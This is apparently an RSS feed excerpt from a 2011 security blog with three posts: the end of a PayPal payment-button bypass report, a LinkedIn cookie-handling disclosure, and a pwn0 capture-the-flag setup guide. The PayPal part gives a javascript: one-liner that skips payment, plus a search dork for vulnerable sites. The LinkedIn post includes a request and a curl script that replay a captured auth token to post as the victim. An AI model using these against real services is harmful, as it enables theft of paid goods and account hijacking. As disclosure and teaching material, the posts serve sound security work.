<blockquote><p>Farhan,</p>
<p>Thank you for the notification regarding the vulnerable button implementations on merchant sites. At this time, we are actively investigating the noted issues within our customers&#8217; implementations. All issues will be handled professionally and quickly. Again we appreciate you bringing this to our attention.</p>
<p>Thank you,</p>
<p>PayPal Site Security </p>
<p>(<a href="mailto:sitesecurity@paypal.com">sitesecurity@paypal.com</a>)</p>
</blockquote>
<p>The JavaScript is very simple. It just redirects the user by fetching the download page URL from the website’s source code. The download link is in a hidden input tag whose name attribute is &quot;return&quot;.</p>
<blockquote><p><code>javascript:top.location=document.getElementsByName('return')[0].value;javascript:void(0);</code></p>
</blockquote>
<p>Moreover, the JavaScript is floating around various <a href="http://www.google.com/search?q=paypal+bypass+javascript&amp;oq=paypal%20+bypass+javascript" target="_blank">blogs and forums</a>, and a lot of video tutorials have been uploaded to <a href="http://www.youtube.com/results?search_query=bypass+paypal" target="_blank">YouTube</a>. The affected websites can easily be found with this Google dork,</p>
<blockquote><p>&quot;this order button requires a javascript enabled browser&quot;</p>
</blockquote>
<p>Google lists a whopping 1,390,000 results, so this many sites are at risk and easy to exploit. The internet is flooded with this vulnerability and its exploit, but the biggest question is why PayPal, which is considered the most secure payment service, has not paid attention to this theft until now.</p>
<p>This vulnerability and post have been submitted by <a href="http://facebook.com/farhan.ghumra" target="_blank">Farhan Ghumra</a>, a computer engineering student from Rajkot, India.</p>
<p><u>Disclaimer</u></p>
<p><em>This blog-post is provided to you on an as-is basis. The opinions expressed in this post <u>are not those</u> of the website/blog owner, Rishi Narang, or any other author except the one explicitly mentioned in this blog-post. While this weblog makes every effort to ensure that the contents within are accurate and complete, this weblog makes no representation or warranty, whether express or implied, as to the operation, integrity, availability or functionality of this weblog or as to the accuracy, completeness or reliability of any information on this weblog. Any person who accesses this weblog or relies on the information contained in this weblog does so at their own risk. All data and information provided on this weblog is for informational purposes only.</em></p>
<p><strong>[*]</strong> This bypass technique is already in the wild, and people have written blogs and shared videos on it. It may not be the first discovery here, but as per the author Farhan, he shares &amp; quotes this discovery as his own research, a little late in time though!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wtfuzz.com/blogs/critical-vulnerability-in-paypal/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>LinkedIn SSL Cookie Vulnerability</title>
		<link>http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/</link>
		<comments>http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/#comments</comments>
		<pubDate>Sat, 21 May 2011 11:12:06 +0000</pubDate>
		<dc:creator>Rishi Narang</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[GST]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[leo_auth_token]]></category>
		<category><![CDATA[LIM]]></category>
		<category><![CDATA[linkedin]]></category>
		<category><![CDATA[narang]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[POC]]></category>
		<category><![CDATA[professional]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[rishi]]></category>
		<category><![CDATA[rishi.narang]]></category>
		<category><![CDATA[rishinarang]]></category>
		<category><![CDATA[rnarang]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[session]]></category>
		<category><![CDATA[ssl]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.wtfuzz.com/blogs/linkedin-ssl-cookie/</guid>
		<description><![CDATA[Rishi Narang, a security researcher and consultant, has discovered multiple vulnerabilities in LinkedIn (www.linkedin.com) which can enable an attacker to modify an account "without a password". Read about this session management nightmare at www.wtfuzz.com or contact him on Twitter (@rnarang) for further details.]]></description>
			<content:encoded><![CDATA[<h4><img style="background-image: none; border-right-width: 0px; margin: 0px 11px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; float: left; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="linkedin-cracked" border="0" alt="linkedin-cracked" align="left" src="http://www.wtfuzz.com/wp-content/uploads/2011/05/linkedin-cracked.png" width="99" height="99" /></h4>
<p>LinkedIn is a business-oriented social networking site. Founded in December 2002 and launched in May 2003, it is mainly used for professional networking. As of 22 March 2011, LinkedIn reports more than 100 million registered users, spanning more than 200 countries and territories worldwide.</p>
<p>There exist multiple vulnerabilities in the way LinkedIn handles cookies and transmits them over SSL. If exploited, these vulnerabilities can result in hijacking of user accounts and/or modification of user information without the consent of the profile owner.</p>
<p>&#160;</p>
<p><strong><font style="background-color: #000000" color="#ffffff">Executive Summary</font></strong></p>
<p><u>Name</u>: <strong>LinkedIn SSL Cookie Vulnerability (SESSION and AUTH TOKEN)</strong></p>
<p><u>Severity</u>:&#160; <strong>High</strong></p>
<p><u>Host</u>(s): <a href="https://www.linkedin.com" target="_blank"><strong>https://www.linkedin.com</strong></a> and <a href="http://www.linkedin.com" target="_blank"><strong>http://www.linkedin.com</strong></a></p>
<p><u>Author</u>/<u>Contact Person</u>: <strong><font color="#000000">Rishi Narang&#160; </font></strong>( <strong>Twitter</strong>: <a href="http://twitter.com/#!/rnarang" target="_blank">@rnarang</a> | <strong>Mail</strong>: <a href="mailto:rishi@wtfuzz.com" target="_blank">rishi[at]wtfuzz.com</a> | <strong>LinkedIn</strong>: <a href="http://in.linkedin.com/in/rishinarang" target="_blank">http://in.linkedin.com/in/rishinarang</a> )</p>
<p><em>PS: I received some comments recently through different mediums &amp; channels, so, if you need any details or clarifications please contact me through Twitter and/or Mail address as mentioned above.</em></p>
<p><strong><font style="background-color: #000000" color="#ffffff">Background Information</font></strong></p>
<p>LinkedIn can be accessed over HTTPS and HTTP connections. The sign-in page,<span id="more-271"></span> <strong>if accessed over HTTPS, redirects you to HTTP on successful authentication</strong>. By default the welcome page stores the following important cookies (only the SESSION and AUTH TOKEN in scope are highlighted),</p>
<p><img style="background-image: none; border-right-width: 0px; margin: 0px 9px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="" border="0" alt="" src="http://www.wtfuzz.com/wp-content/uploads/2011/05/linkedin_cookies.jpg" width="1011" height="254" /></p>
<p>After a successful login (over HTTPS or HTTP), the values of the cookies should change, specifically the JSESSIONID and AUTH_TOKEN. The JSESSIONID remains the same no matter what; only when the browser exits does the server send a new JSESSIONID. Now, let’s see how <strong>leo_auth_token</strong> changes after successful authentication and login …</p>
<p><img style="background-image: none; border-right-width: 0px; margin: 0px 9px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="linkedin_cookies1" border="0" alt="linkedin_cookies1" src="http://www.wtfuzz.com/wp-content/uploads/2011/05/linkedin_cookies1.jpg" width="1014" height="298" /></p>
<p><strong><font style="background-color: #000000" color="#ffffff">JSESSIONID</font></strong></p>
<p>Ideally this cookie is used for tracking the session, and thus it has an ID generated to track that session in the application and server logs. As per information available online, the JSESSIONID cookie is created/sent when a session is created. A session is created when your code calls <code>request.getSession()</code> or <code>request.getSession(true)</code> for the first time. If you just want to get the session, but not create it if it doesn&#8217;t exist, use <code>request.getSession(false)</code> &#8212; this will return you a session or <code>null</code>. In this case, a new session is not created and the JSESSIONID cookie is not sent. This also means that the session isn&#8217;t necessarily created on the first request; you and your code are in control of <em>when</em> the session is created.</p>
<p>Example: <code>JSESSIONID=&quot;ajax:2960939797451683300&quot;</code>. The syntax for this session id is ajax:&lt;19 digit code&gt;</p>
<p><strong><font style="background-color: #000000" color="#ffffff">LEO_AUTH_TOKEN</font></strong></p>
<p>There is not much information available on this cookie to my knowledge, but I could relate some sections as follows.</p>
<p>Example: leo_auth_token=&quot;LIM:<font style="background-color: #ffff00">118607520</font>:a:<font style="background-color: #00ff00">1305884679</font>:<font style="background-color: #4bacc6">b42ee51919add89581a0b49ebe1e420dbb93a468</font>&quot; (only the highlighted parts are referenced below)</p>
<ol>
<li><u>118607520</u>: This is the <strong>User ID</strong>. It can also be verified when viewing someone’s profile. It travels over the network <u>unencrypted</u> and is also available in GET requests.</li>
<li><u>1305884679</u>: <strike>This is ‘perhaps’ <em>(guess analysis)</em> the user <strong>login counter</strong> (global)</strike>. I am not sure if it resets or is just progressive, but surely with every login it increments by 1. Special thanks to <strong>Julio</strong> for the clarification that this is the Unix Timestamp of the time the user logs in. (Refer: <a href="http://www.onlineconversion.com/unix_time.htm" target="_blank">http://www.onlineconversion.com/unix_time.htm</a>). This Unix Timestamp also decides the expiry date of the cookie <em>(1 year from this time, which is too much for an attacker)</em>.</li>
<li><u>b42ee51919add89581a0b49ebe1e420dbb93a468</u>: This is an approximately 40 character long hexadecimal string. It can be shorter or longer and is not fixed in length. I am <strong>still working</strong> on whether it can be decrypted or can be related/tied to some part of the session.</li>
</ol>
<p>In general these two (2) cookies are enough to validate a session. Both cookie values have to be enclosed in &quot;quotes&quot;; here is a sample POST request (used in a <strong>LinkedIn status update</strong>) for reference,</p>
<blockquote>
<p>POST http://www.linkedin.com/share?submitPost= HTTP/1.1      <br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8       <br />Cookie: leo_auth_token=&quot;LIM:118607520:a:1305884679:b42ee51919add89581a0b49ebe1e420dbb93a468&quot;;JSESSIONID=&quot;ajax:2960939797451683300&quot;</p>
<p>ajax=true&amp;postText=TEST_STATUS&amp;postVisibility=EVERYONE&amp;csrfToken=ajax:2960939797451683300</p>
</blockquote>
<p>This request results in changing the User Status on the profile page. So, what and where is the vulnerability here?</p>
<p><strong><font style="background-color: #000000" color="#ffffff">Vulnerability Information</font></strong></p>
<p>There are two (2) vulnerabilities relating to the cookies (communication channel and session lock), as explained below,</p>
<p><strong>1. SSL cookie without secure flag set</strong></p>
<p>It means that all the cookies, including the JSESSIONID and LEO_AUTH_TOKEN, are available in plain text over an unencrypted channel of communication. These cookies appear to contain session tokens, which may increase the risk associated with the authentication procedure. One should review the contents of the cookies to determine their function and the need for encryption. If the secure flag is set on a cookie, browsers will not submit the cookie in any request that uses an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, the cookie will be transmitted in clear text whenever the user visits any HTTP URL within the cookie&#8217;s scope.</p>
<p><u>Impact</u></p>
<p>An attacker may be able to perform an MITM attack and thus capture these cookies from an established LinkedIn session. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form <a href="https://www.linkedin.com">https://www.linkedin.com</a> to perform the same attack.</p>
<p><u>Workaround</u></p>
<p>The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.</p>
<p><strong>2. Cookie Expiration &amp; Session Handling</strong></p>
<p>It means that the cookie for an authenticated session remains usable even after the session has been terminated, or way beyond the expected expiry (compared to a session logout, it is valid for 1 year). There are examples where old cookies can still be used to hijack authenticated sessions, and these cookies are (literally) months old. As a result, in just 15 minutes I was able to access multiple active accounts belonging to individuals in different global locations. They would have logged in and out many times in these months, but their cookies were still valid.</p>
<p>Even though a cookie expiry date is set, the cookies remain valid. Why does LinkedIn keep the cookie active even after the user has &quot;logged out&quot; and closed the session? Worse, even when the same has been done a hundred times!</p>
<p><u>Impact</u></p>
<p>As a result of these long-lived cookies, an attacker can sniff the cookies from a clear-text session (explained above) and then use them to authenticate his own session. He can then compromise and modify the information on the user’s profile page.</p>
<p><u>Workaround</u></p>
<p>The expiry date/time should be tied to a fixed &#8216;period&#8217;, to the user&#8217;s session logout, to the IP address, etc. In the <u>absence of a fixed and reasonable expiration period</u> (1 year is not reasonable/acceptable), a cookie remains active months <strike>and year</strike> after its authentication. Define expiration as the end of the session, or as long as the JSESSIONID is valid.</p>
<p><strong><font style="background-color: #000000" color="#ffffff">Curious case of JSESSIONID</font></strong></p>
<p>As I mentioned about the JSESSIONID above, ideally the session should be mapped to this ID and, if the ID is tampered with, the session should be disconnected. At least, I would expect it to work this way! But even if you change the JSESSIONID to <font style="background-color: #ffffff">ajax:0000000000000000000</font> <em>(ajax followed by 19 digits)</em>, the session is still valid and the server continues accepting requests with this JSESSIONID.</p>
<p>Even if it has nothing to do with the session and is only used for tracking, tinkering with the SESSION id will surely break the tracking at the server end.</p>
<p><strong><font style="background-color: #000000" color="#ffffff">LinkedIn Status Update Bash Script</font> </strong>(<a href="http://www.wtfuzz.com/code/linkedin.sh" target="_blank">Download Here</a>)</p>
<p>Here is a small script to update the status on the LinkedIn profile page from the command line. It takes as input the &quot;LIM:XXXX&quot; cookie value and the new status update.</p>
<blockquote><pre><code>#!/bin/bash
# LinkedIn status update script (command-line status update using the
# leo_auth_token cookie value). JSESSIONID is deliberately set to all zeros
# to show that the server does not validate it.

clear
echo ""
echo " =================================================="
echo " #          LinkedIN Status Update Script         #"
echo " #          -----------------------------         #"
echo " #      Author: Rishi Narang (rishi@wtfuzz.com)   #"
echo " #              -- WWW.WTFUZZ.COM --              #"
echo " #                                                #"
echo " =================================================="
echo ""

echo -en " - Auth Cookie (Format - LIM:XXXX): "
read -r LIM

echo -en " - New Status: "
read -r UPDATE

TMP="linKIN.tmp"
: > "$TMP"   # make sure the file exists even if curl fails

# Both cookie values must be sent enclosed in double quotes.
# postText is URL-encoded so that spaces or '&' in the status do not break the body.
curl -s -b "leo_auth_token=\"${LIM}\";JSESSIONID=\"ajax:0000000000000000000\"" \
     -d "ajax=true" \
     --data-urlencode "postText=${UPDATE}" \
     -d "postVisibility=EVERYONE" \
     -d "csrfToken=ajax%3A0000000000000000000" \
     "http://www.linkedin.com/share?submitPost=" -o "$TMP"

echo ""
OUT=$(grep -c "SUCCESS" "$TMP")
DUP=$(grep -c "DUPLICATE" "$TMP")

if [ "$OUT" -eq 1 ]
then
        echo -e "MSG: Status updated successfully!\n"
elif [ "$DUP" -eq 1 ]
then
        echo -e "ERROR: Duplicate Status! Please enter a new status.\n"
else
        echo -e "ERROR: Please try again later.\n"
fi
rm -f "$TMP"
echo ""
#EOD
</code></pre></blockquote>
<div><img style="background-image: none; border-right-width: 0px; margin: 0px 9px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="bash" border="0" alt="bash" src="http://www.wtfuzz.com/wp-content/uploads/2011/05/bash.jpg" width="856" height="212" /></div>
<div>&#160;</div>
<div>This is all from my side; use this information responsibly until LinkedIn fixes the vulnerability!</div>
<div>&#160;</div>
<div><strong>REAL SCENARIO</strong></div>
<div>You are connected to a network at the office or at home, someone captures the cookies in the traffic or uses <a href="http://codebutler.com/firesheep-a-week-later-idiot-shepherds" target="_blank">Firesheep</a>, and boom! Your account is hijacked. You as a user will not come to know that the cookie was stolen or that there has been a parallel login by the attacker. And LinkedIn doesn’t maintain any list of IP addresses (for a user to view in his account) that have been used to access your account, as Gmail etc. do.</div>
<div>After some recent developments and some miscommunication, I will make it clear that changing the password and then logging in with the new password expires the old cookie. A password change alone keeps the old cookie alive, so you need at least one login to let the old cookie expire. Here is a working video of the vulnerability, showing how a change of IP address, session logout etc. doesn&#8217;t expire the cookies.</div>
<div>&#160;</div>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/JU05kjAvHY4?hl=en&amp;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/JU05kjAvHY4?hl=en&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
<div>&#160;</div>
<div>On some requests, here is a process to show how the cookie remains valid even after the password is changed (but before the user authenticates with the new credentials)</div>
<div>&#160;</div>
<div><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/ZgNKoplI7gc?hl=en&amp;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param> <embed src="http://www.youtube.com/v/ZgNKoplI7gc?hl=en&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div>
<div>&#160;</div>
<div><strong>Disclaimer:</strong></div>
<div>The author is not responsible for the misuse of the information presented in this blog or anywhere on the domain <a href="http://www.wtfuzz.com">www.wtfuzz.com</a>. The ideas discussed on this site are simply ideas and the site or the owner will not be held accountable for any losses or gains that one accrues, if any way linked to the ideas on the site. Examples and methods presented on this post or anywhere on <a href="http://www.wtfuzz.com">www.wtfuzz.com</a> pages are for educational purposes only.</div>
]]></content:encoded>
			<wfw:commentRss>http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/feed/</wfw:commentRss>
		<slash:comments>66</slash:comments>
		</item>
		<item>
		<title>PWN0 Scripts</title>
		<link>http://www.wtfuzz.com/blogs/pwn0-scripts/</link>
		<comments>http://www.wtfuzz.com/blogs/pwn0-scripts/#comments</comments>
		<pubDate>Mon, 25 Apr 2011 16:25:55 +0000</pubDate>
		<dc:creator>Rishi Narang</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[capture]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[flag]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[openvpn]]></category>
		<category><![CDATA[pwn]]></category>
		<category><![CDATA[pwn0]]></category>
		<category><![CDATA[scan]]></category>
		<category><![CDATA[score]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[users]]></category>

		<guid isPermaLink="false">http://www.wtfuzz.com/blogs/pwn0-scripts/</guid>
		<description><![CDATA[PWN0 (http://pwn0.com), the hackers' playground, is a VPN where (almost) anything goes. You just need to sign up, connect to the VPN and start hacking. This is what the website says! I loved the domain name and felt like giving it a shot. Here is how the home page looks, Pretty intriguing! Isn&#8217;t it? [...]]]></description>
			<content:encoded><![CDATA[<p>PWN0 (<a href="http://pwn0.com" target="_blank">http://pwn0.com</a>), the hackers’ playground, is a VPN where (almost) anything goes. You just need to sign up, connect to the VPN and start hacking. This is what the website says! I loved the domain name and felt like giving it a shot. Here is how the home page looks,</p>
<p><img style="background-image: none; border-right-width: 0px; margin: 0px 9px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="pwn0" border="0" alt="pwn0" src="http://www.wtfuzz.com/wp-content/uploads/2011/04/pwn02.png" width="887" height="220" /></p>
<p>Pretty intriguing, isn&#8217;t it? Anyway, I read the forum (only 1 informative post to date) and the usual stuff here and there. It requires (recommends) <a href="http://openvpn.net/" target="_blank">OpenVPN</a> to connect to its servers. They have configuration files available on their website to connect to the pwn0 server. Once you have registered, you can browse the configuration archive <a href="https://pwn0.com/vpn0_zip.php" target="_blank">here</a> (ZIP) and <a href="https://pwn0.com/vpn0_tar.php" target="_blank">here</a> (TAR.GZ). Here is my configuration and<span id="more-247"></span> a small hands-on guide on how I performed the same,</p>
<p>I downloaded and installed OpenVPN on my Ubuntu using,</p>
<blockquote><p><code>apt-get install openvpn</code></p>
</blockquote>
<p>After installing it, I played with it for a while to look at the configuration options, file imports etc. I was wondering how to change the default options, and after searching through its files for some minutes I figured out that the configuration directory (unzip the config file downloaded from pwn0) should ideally be placed at /etc/openvpn/. So, the structure looked like,</p>
<p><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px 9px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; float: left; border-top: 0px; border-right: 0px; padding-top: 0px" title="pwn_ls" border="0" alt="pwn_ls" align="left" src="http://www.wtfuzz.com/wp-content/uploads/2011/04/pwn_ls1.png" width="540" height="57" />This structure shows the 6 files supplied in the archive package from pwn0. These files contain the certificates (ca.crt, &lt;username&gt;.crt) and the key file (&lt;username&gt;.key), together with 3 configuration files (pwn0.conf, pwn0.ovpn, pwn0.ovpn.udp). To start OpenVPN with the &#8216;pwn0 configuration&#8217;, issue the following command:</p>
<blockquote><p><code>[reboot:/etc/openvpn/config]# openvpn --config pwn0.conf</code></p>
</blockquote>
<p><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px 9px 9px 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="connect" border="0" alt="connect" src="http://www.wtfuzz.com/wp-content/uploads/2011/04/connect1.png" width="829" height="427" /></p>
<p>After connecting to the pwn0 server, make sure you can see the tunnel IP 10.225.0.* in your interface list and can ping the fellow IP addresses. If yes, then bravo, you are done with all the configuration. Time to play some tricks now. Here are some files (bash scripts) which should be executed from the same console as the VPN connection (I used Linux, so the scripts are written in BASH).</p>
<p>List of Scripts,</p>
<ol>
<li><strong>uson.sh</strong> – A script that finds the online users, to help you plan your strategy. When executed, the script creates a new file named &quot;uson&quot; and saves the usernames in it. [ Script Code: <a href="http://wtfuzz.com/code/uson.sh.txt" target="_blank">View</a> | <a href="http://wtfuzz.com/code/uson.sh" target="_blank">Download</a> ]</li>
<li><strong>ipon.sh</strong> – A script that finds the IP addresses of the users connected to the pwn0 VPN. It creates a new file named &quot;ipon&quot; and lists the IP addresses in it. [ Script Code: <a href="http://wtfuzz.com/code/ipon.sh.txt" target="_blank">View</a> | <a href="http://wtfuzz.com/code/ipon.sh" target="_blank">Download</a> ]</li>
<li><strong>score.sh</strong> – A script that helps you perform one kind of attack, where you access the URL <em>http://vpn.pwn0.com/score?user=&lt;username&gt;</em> and &#8216;username&#8217; is that of any active online VPN user. This script does the whole job automatically and takes a Username File as input. Execute it as &quot;./score.sh&quot; [ Script Code: <a href="http://wtfuzz.com/code/score.sh.txt" target="_blank">View</a> | <a href="http://wtfuzz.com/code/score.sh" target="_blank">Download</a> ]</li>
<li><strong>rscore.sh</strong> – The same job as score.sh, but scoring as root. <em>(sorry, will update the script later.)</em></li>
</ol>
<p>I am one day old in this CTF at <a href="http://pwn0.com" target="_blank">pwn0.com</a>, so I will release other parts as and when I complete the levels :). Meanwhile, happy hacking to all and best wishes! Feel free to comment here with any suggestions, new techniques or improvements.</p>
<p><em>PS: All these scripts are raw and were created in a few hours. Excuse me if there are better ways, but this is just home cooking! *Not to be tested in production environments or with random inputs*</em></p>
<p>Cheers!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wtfuzz.com/blogs/pwn0-scripts/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 5.291 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2012-05-19 11:29:48 -->

